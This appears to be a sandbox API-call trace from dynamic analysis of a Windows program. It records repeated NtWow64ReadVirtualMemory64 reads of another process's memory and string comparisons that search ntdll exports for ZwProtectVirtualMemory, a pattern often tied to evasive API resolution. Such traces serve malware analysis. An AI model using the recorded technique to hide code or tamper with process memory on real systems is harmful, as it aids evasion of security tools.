0x0 [0077.790] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee435000, Buffer=0x7ff8, BufferSize=0x2775000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.790] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee436000, Buffer=0x7ff8, BufferSize=0x2776000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.790] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee437000, Buffer=0x7ff8, BufferSize=0x2777000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.791] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee438000, Buffer=0x7ff8, BufferSize=0x2778000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.791] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee439000, Buffer=0x7ff8, BufferSize=0x2779000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.791] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee43a000, Buffer=0x7ff8, BufferSize=0x277a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.791] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee43b000, Buffer=0x7ff8, BufferSize=0x277b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.791] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee43c000, Buffer=0x7ff8, BufferSize=0x277c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.791] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee43d000, Buffer=0x7ff8, BufferSize=0x277d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.791] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee43e000, Buffer=0x7ff8, BufferSize=0x277e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.792] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee43f000, Buffer=0x7ff8, BufferSize=0x277f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.792] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee440000, Buffer=0x7ff8, BufferSize=0x2780000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.792] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee441000, Buffer=0x7ff8, BufferSize=0x2781000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.792] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee442000, Buffer=0x7ff8, BufferSize=0x2782000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.793] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee443000, Buffer=0x7ff8, BufferSize=0x2783000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.793] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee444000, Buffer=0x7ff8, BufferSize=0x2784000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.793] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee445000, Buffer=0x7ff8, BufferSize=0x2785000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.793] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee446000, Buffer=0x7ff8, BufferSize=0x2786000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.793] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee447000, Buffer=0x7ff8, BufferSize=0x2787000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.793] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee448000, Buffer=0x7ff8, BufferSize=0x2788000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.793] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee449000, Buffer=0x7ff8, BufferSize=0x2789000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.794] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee44a000, Buffer=0x7ff8, BufferSize=0x278a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.794] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee44b000, Buffer=0x7ff8, BufferSize=0x278b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.794] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee44c000, Buffer=0x7ff8, BufferSize=0x278c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.794] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee44d000, Buffer=0x7ff8, BufferSize=0x278d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.794] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee44e000, Buffer=0x7ff8, BufferSize=0x278e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.794] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee44f000, Buffer=0x7ff8, BufferSize=0x278f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.794] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee450000, Buffer=0x7ff8, BufferSize=0x2790000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.795] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee451000, Buffer=0x7ff8, BufferSize=0x2791000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.795] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee452000, Buffer=0x7ff8, BufferSize=0x2792000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.795] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee453000, Buffer=0x7ff8, BufferSize=0x2793000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.795] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee454000, Buffer=0x7ff8, BufferSize=0x2794000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.795] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee455000, Buffer=0x7ff8, BufferSize=0x2795000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.795] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee456000, Buffer=0x7ff8, BufferSize=0x2796000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.795] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee457000, Buffer=0x7ff8, BufferSize=0x2797000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.796] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee458000, Buffer=0x7ff8, BufferSize=0x2798000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.796] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee459000, Buffer=0x7ff8, BufferSize=0x2799000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.796] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee45a000, Buffer=0x7ff8, BufferSize=0x279a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.796] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee45b000, Buffer=0x7ff8, BufferSize=0x279b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.796] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee45c000, Buffer=0x7ff8, BufferSize=0x279c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.796] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee45d000, Buffer=0x7ff8, BufferSize=0x279d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.796] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee45e000, Buffer=0x7ff8, BufferSize=0x279e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.797] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee45f000, Buffer=0x7ff8, BufferSize=0x279f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.797] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee460000, Buffer=0x7ff8, BufferSize=0x27a0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.797] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee461000, Buffer=0x7ff8, BufferSize=0x27a1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.797] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee462000, Buffer=0x7ff8, BufferSize=0x27a2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.797] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee463000, Buffer=0x7ff8, BufferSize=0x27a3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.797] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee464000, Buffer=0x7ff8, BufferSize=0x27a4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.797] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee465000, Buffer=0x7ff8, BufferSize=0x27a5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.798] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee466000, Buffer=0x7ff8, BufferSize=0x27a6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.798] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee467000, Buffer=0x7ff8, BufferSize=0x27a7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.798] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee468000, Buffer=0x7ff8, BufferSize=0x27a8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.798] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee469000, Buffer=0x7ff8, BufferSize=0x27a9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.798] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee46a000, Buffer=0x7ff8, BufferSize=0x27aa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.798] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee46b000, Buffer=0x7ff8, BufferSize=0x27ab000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.798] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee46c000, Buffer=0x7ff8, BufferSize=0x27ac000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.799] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee46d000, Buffer=0x7ff8, BufferSize=0x27ad000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.799] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee46e000, Buffer=0x7ff8, BufferSize=0x27ae000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.799] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee46f000, Buffer=0x7ff8, BufferSize=0x27af000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.799] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee470000, Buffer=0x7ff8, BufferSize=0x27b0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.799] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee471000, Buffer=0x7ff8, BufferSize=0x27b1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.799] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee472000, Buffer=0x7ff8, BufferSize=0x27b2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.799] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee473000, Buffer=0x7ff8, BufferSize=0x27b3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.800] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee474000, Buffer=0x7ff8, BufferSize=0x27b4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.800] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee475000, Buffer=0x7ff8, BufferSize=0x27b5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.800] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee476000, Buffer=0x7ff8, BufferSize=0x27b6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.800] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee477000, Buffer=0x7ff8, BufferSize=0x27b7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.800] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee478000, Buffer=0x7ff8, BufferSize=0x27b8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.823] lstrcmpA (lpString1="A_SHAFinal", lpString2="ZwProtectVirtualMemory") returned -1 [0077.823] lstrcmpA (lpString1="A_SHAInit", lpString2="ZwProtectVirtualMemory") returned -1 [0077.823] lstrcmpA (lpString1="A_SHAUpdate", lpString2="ZwProtectVirtualMemory") returned -1 [0077.823] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="ZwProtectVirtualMemory") returned -1 [0077.823] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="ZwProtectVirtualMemory") returned -1 [0077.823] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="ZwProtectVirtualMemory") returned -1 [0077.823] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="ZwProtectVirtualMemory") returned -1 [0077.823] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="ZwProtectVirtualMemory") returned -1 [0077.823] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="ZwProtectVirtualMemory") returned -1 [0077.823] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="ZwProtectVirtualMemory") returned -1 [0077.823] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="ZwProtectVirtualMemory") returned -1 [0077.823] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="ZwProtectVirtualMemory") returned -1 [0077.823] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="ZwProtectVirtualMemory") returned -1 [0077.825] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="ZwProtectVirtualMemory") returned -1 [0077.825] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="ZwProtectVirtualMemory") returned -1 [0077.825] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="ZwProtectVirtualMemory") returned -1 [0077.825] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="ZwProtectVirtualMemory") returned -1 [0077.825] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="ZwProtectVirtualMemory") returned -1 [0077.825] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ZwProtectVirtualMemory") returned -1 [0077.825] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="ZwProtectVirtualMemory") returned -1 [0077.825] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ZwProtectVirtualMemory") returned -1 [0077.825] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="ZwProtectVirtualMemory") returned -1 [0077.825] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="ZwProtectVirtualMemory") returned -1 [0077.825] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="ZwProtectVirtualMemory") returned -1 [0077.825] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="ZwProtectVirtualMemory") returned -1 [0077.825] lstrcmpA (lpString1="CsrClientCallServer", lpString2="ZwProtectVirtualMemory") returned -1 [0077.825] lstrcmpA (lpString1="CsrClientConnectToServer", lpString2="ZwProtectVirtualMemory") returned -1 [0077.825] lstrcmpA (lpString1="CsrFreeCaptureBuffer", lpString2="ZwProtectVirtualMemory") returned -1 [0077.825] lstrcmpA (lpString1="CsrGetProcessId", lpString2="ZwProtectVirtualMemory") returned -1 [0077.825] lstrcmpA (lpString1="CsrIdentifyAlertableThread", lpString2="ZwProtectVirtualMemory") returned -1 [0077.825] lstrcmpA (lpString1="CsrSetPriorityClass", lpString2="ZwProtectVirtualMemory") returned -1 [0077.825] lstrcmpA (lpString1="CsrVerifyRegion", lpString2="ZwProtectVirtualMemory") returned -1 [0077.825] lstrcmpA (lpString1="DbgBreakPoint", lpString2="ZwProtectVirtualMemory") returned -1 [0077.825] lstrcmpA (lpString1="DbgPrint", lpString2="ZwProtectVirtualMemory") returned -1 [0077.825] lstrcmpA (lpString1="DbgPrintEx", lpString2="ZwProtectVirtualMemory") returned -1 [0077.825] lstrcmpA (lpString1="DbgPrintReturnControlC", lpString2="ZwProtectVirtualMemory") returned -1 [0077.826] lstrcmpA (lpString1="DbgPrompt", lpString2="ZwProtectVirtualMemory") returned -1 [0077.826] lstrcmpA (lpString1="DbgQueryDebugFilterState", lpString2="ZwProtectVirtualMemory") returned -1 [0077.826] lstrcmpA (lpString1="DbgSetDebugFilterState", lpString2="ZwProtectVirtualMemory") returned -1 [0077.826] lstrcmpA (lpString1="DbgUiConnectToDbg", lpString2="ZwProtectVirtualMemory") returned -1 [0077.826] lstrcmpA (lpString1="DbgUiContinue", lpString2="ZwProtectVirtualMemory") returned -1 [0077.826] lstrcmpA (lpString1="DbgUiConvertStateChangeStructure", lpString2="ZwProtectVirtualMemory") returned -1 [0077.826] lstrcmpA (lpString1="DbgUiConvertStateChangeStructureEx", lpString2="ZwProtectVirtualMemory") returned -1 [0077.826] lstrcmpA (lpString1="DbgUiDebugActiveProcess", lpString2="ZwProtectVirtualMemory") returned -1 [0077.826] lstrcmpA (lpString1="DbgUiGetThreadDebugObject", lpString2="ZwProtectVirtualMemory") returned -1 [0077.826] lstrcmpA (lpString1="DbgUiIssueRemoteBreakin", lpString2="ZwProtectVirtualMemory") returned -1 [0077.826] lstrcmpA (lpString1="DbgUiRemoteBreakin", lpString2="ZwProtectVirtualMemory") returned -1 [0077.826] lstrcmpA (lpString1="DbgUiSetThreadDebugObject", lpString2="ZwProtectVirtualMemory") returned -1 [0077.826] lstrcmpA (lpString1="DbgUiStopDebugging", lpString2="ZwProtectVirtualMemory") returned -1 [0077.826] lstrcmpA (lpString1="DbgUiWaitStateChange", lpString2="ZwProtectVirtualMemory") returned -1 [0077.826] lstrcmpA (lpString1="DbgUserBreakPoint", lpString2="ZwProtectVirtualMemory") returned -1 [0077.826] lstrcmpA (lpString1="EtwCreateTraceInstanceId", lpString2="ZwProtectVirtualMemory") returned -1 [0077.826] lstrcmpA (lpString1="EtwDeliverDataBlock", lpString2="ZwProtectVirtualMemory") returned -1 [0077.826] lstrcmpA (lpString1="EtwEnumerateProcessRegGuids", lpString2="ZwProtectVirtualMemory") returned -1 [0077.826] lstrcmpA (lpString1="EtwEventActivityIdControl", lpString2="ZwProtectVirtualMemory") returned -1 [0077.826] lstrcmpA (lpString1="EtwEventEnabled", lpString2="ZwProtectVirtualMemory") returned -1 [0077.826] lstrcmpA (lpString1="EtwEventProviderEnabled", lpString2="ZwProtectVirtualMemory") returned -1 [0077.826] lstrcmpA (lpString1="EtwEventRegister", lpString2="ZwProtectVirtualMemory") returned -1 [0077.826] lstrcmpA (lpString1="EtwEventSetInformation", lpString2="ZwProtectVirtualMemory") returned -1 [0077.826] lstrcmpA (lpString1="EtwEventUnregister", lpString2="ZwProtectVirtualMemory") returned -1 [0077.826] lstrcmpA (lpString1="EtwEventWrite", lpString2="ZwProtectVirtualMemory") returned -1 [0077.826] lstrcmpA (lpString1="EtwEventWriteEndScenario", lpString2="ZwProtectVirtualMemory") returned -1 [0077.826] lstrcmpA (lpString1="EtwEventWriteEx", lpString2="ZwProtectVirtualMemory") returned -1 [0077.826] lstrcmpA (lpString1="EtwEventWriteFull", lpString2="ZwProtectVirtualMemory") returned -1 [0077.826] lstrcmpA (lpString1="EtwEventWriteNoRegistration", lpString2="ZwProtectVirtualMemory") returned -1 [0077.826] lstrcmpA (lpString1="EtwEventWriteStartScenario", lpString2="ZwProtectVirtualMemory") returned -1 [0077.826] lstrcmpA (lpString1="EtwEventWriteString", lpString2="ZwProtectVirtualMemory") returned -1 [0077.826] lstrcmpA (lpString1="EtwEventWriteTransfer", lpString2="ZwProtectVirtualMemory") returned -1 [0077.826] lstrcmpA (lpString1="EtwGetTraceEnableFlags", lpString2="ZwProtectVirtualMemory") returned -1 [0077.826] lstrcmpA (lpString1="EtwGetTraceEnableLevel", lpString2="ZwProtectVirtualMemory") returned -1 [0077.826] lstrcmpA (lpString1="EtwGetTraceLoggerHandle", lpString2="ZwProtectVirtualMemory") returned -1 [0077.826] lstrcmpA (lpString1="EtwLogTraceEvent", lpString2="ZwProtectVirtualMemory") returned -1 [0077.826] lstrcmpA (lpString1="EtwNotificationRegister", lpString2="ZwProtectVirtualMemory") returned -1 [0077.826] lstrcmpA (lpString1="EtwNotificationUnregister", lpString2="ZwProtectVirtualMemory") returned -1 [0077.826] lstrcmpA (lpString1="EtwProcessPrivateLoggerRequest", lpString2="ZwProtectVirtualMemory") returned -1 [0077.826] lstrcmpA (lpString1="EtwRegisterSecurityProvider", lpString2="ZwProtectVirtualMemory") returned -1 [0077.826] lstrcmpA (lpString1="EtwRegisterTraceGuidsA", lpString2="ZwProtectVirtualMemory") returned -1 [0077.826] lstrcmpA (lpString1="EtwRegisterTraceGuidsW", lpString2="ZwProtectVirtualMemory") returned -1 [0077.826] lstrcmpA (lpString1="EtwReplyNotification", lpString2="ZwProtectVirtualMemory") returned -1 [0077.826] lstrcmpA (lpString1="EtwSendNotification", lpString2="ZwProtectVirtualMemory") returned -1 [0077.827] lstrcmpA (lpString1="EtwSetMark", lpString2="ZwProtectVirtualMemory") returned -1 [0077.827] lstrcmpA (lpString1="EtwTraceEventInstance", lpString2="ZwProtectVirtualMemory") returned -1 [0077.827] lstrcmpA (lpString1="EtwTraceMessage", lpString2="ZwProtectVirtualMemory") returned -1 [0077.827] lstrcmpA (lpString1="EtwTraceMessageVa", lpString2="ZwProtectVirtualMemory") returned -1 [0077.827] lstrcmpA (lpString1="EtwUnregisterTraceGuids", lpString2="ZwProtectVirtualMemory") returned -1 [0077.827] lstrcmpA (lpString1="EtwWriteUMSecurityEvent", lpString2="ZwProtectVirtualMemory") returned -1 [0077.827] lstrcmpA (lpString1="EtwpCreateEtwThread", lpString2="ZwProtectVirtualMemory") returned -1 [0077.827] lstrcmpA (lpString1="EtwpGetCpuSpeed", lpString2="ZwProtectVirtualMemory") returned -1 [0077.827] lstrcmpA (lpString1="EvtIntReportAuthzEventAndSourceAsync", lpString2="ZwProtectVirtualMemory") returned -1 [0077.827] lstrcmpA (lpString1="EvtIntReportEventAndSourceAsync", lpString2="ZwProtectVirtualMemory") returned -1 [0077.827] lstrcmpA (lpString1="ExpInterlockedPopEntrySListEnd", lpString2="ZwProtectVirtualMemory") returned -1 [0077.827] lstrcmpA (lpString1="ExpInterlockedPopEntrySListFault", lpString2="ZwProtectVirtualMemory") returned -1 [0077.827] lstrcmpA (lpString1="ExpInterlockedPopEntrySListResume", lpString2="ZwProtectVirtualMemory") returned -1 [0077.827] lstrcmpA (lpString1="KiRaiseUserExceptionDispatcher", lpString2="ZwProtectVirtualMemory") returned -1 [0077.827] lstrcmpA (lpString1="KiUserApcDispatcher", lpString2="ZwProtectVirtualMemory") returned -1 [0077.827] lstrcmpA (lpString1="KiUserCallbackDispatcher", lpString2="ZwProtectVirtualMemory") returned -1 [0077.827] lstrcmpA (lpString1="KiUserExceptionDispatcher", lpString2="ZwProtectVirtualMemory") returned -1 [0077.827] lstrcmpA (lpString1="KiUserInvertedFunctionTable", lpString2="ZwProtectVirtualMemory") returned -1 [0077.827] lstrcmpA (lpString1="LdrAccessResource", lpString2="ZwProtectVirtualMemory") returned -1 [0077.827] lstrcmpA (lpString1="LdrAddDllDirectory", lpString2="ZwProtectVirtualMemory") returned -1 [0077.827] lstrcmpA (lpString1="LdrAddLoadAsDataTable", lpString2="ZwProtectVirtualMemory") returned -1 [0077.827] lstrcmpA (lpString1="LdrAddRefDll", lpString2="ZwProtectVirtualMemory") returned -1 [0077.827] lstrcmpA (lpString1="LdrAppxHandleIntegrityFailure", lpString2="ZwProtectVirtualMemory") returned -1 [0077.827] lstrcmpA (lpString1="LdrDisableThreadCalloutsForDll", lpString2="ZwProtectVirtualMemory") returned -1 [0077.827] lstrcmpA (lpString1="LdrEnumResources", lpString2="ZwProtectVirtualMemory") returned -1 [0077.827] lstrcmpA (lpString1="LdrEnumerateLoadedModules", lpString2="ZwProtectVirtualMemory") returned -1 